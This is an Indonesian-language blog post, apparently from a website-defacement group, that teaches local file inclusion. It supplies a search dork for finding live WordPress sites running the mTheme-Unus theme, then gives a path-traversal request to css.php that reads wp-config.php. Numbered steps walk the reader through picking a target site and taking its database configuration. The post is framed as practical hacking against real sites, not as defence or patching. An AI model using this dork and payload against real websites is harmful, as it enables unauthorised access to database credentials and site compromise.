You are here
Home > Deface

Local File Inclusion (LFI)

Local file inclusion

Local file inclusion (LFI) adalah sebuah teknik yang digunakan untuk membaca file menggunakan fungsi include/require terhadap file dalam localhost. Oleh karena itu disebut dengan local file inclusion. Berbeda dengan remote file inclusion (RFI) yang dapat membaca file dari luar host. Untuk pembahasan RFI next ya, susah cari live targetnya :v

Dengan memanfaatkan fungsi tersebut, LFI bisa digunakan untuk membaca script server side seperti php. Yang seharusnya tidak bisa ditampilkan jika sebuah situs dibuka menggunakan web browser. Ini merupakan akibat dari suatu file yang dapat memanggil file lain dengan path yang bisa dimodifikasi dan tanpa filtrasi.

LFI biasa dimanfaatkan untuk mengambil informasi sensitif seperti konfigurasi database, etc/passwd dan access logs. Tetapi terkadang juga bisa digunakan untuk melakukan upload shell backdoor.

Disin saya akan mencontohkan bagaiman LFI dilakukan terhadap tema wordpress mTheme-Unus. Jika penasaran kalian bisa mampir ke exploit-db.

Dork: inurl:/wp-content/themes/mTheme-Unus
Exploit: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php (Untuk mengambil konfigurasi)

1.Lakukan dorking dengan dork diatas
Local file inclusion

2.Kemudian buka situs yang ingin di eksekusi
Local file inclusion

3.Lakukan exploit untuk mengambil konfigurasi database
Local file inclusion

4.Setelah itu akan muncul konfigurasi databasenya
Local file inclusion

Download hackbar, addons firefox yang dapat membantu proses hacking seperti xss, lfi dan sql injection.

Baca juga artikel Local file download, yaitu teknik peretasan yang memanfaatkan fungsi get content untuk mendownload informasi sensitif dalam localhost.

0N3R1D3R
Founder Indonesia To World Team
https://www.indonesiatoworld.org

Berlangganan via email

Ketik email:


Tinggalkan Balasan

Top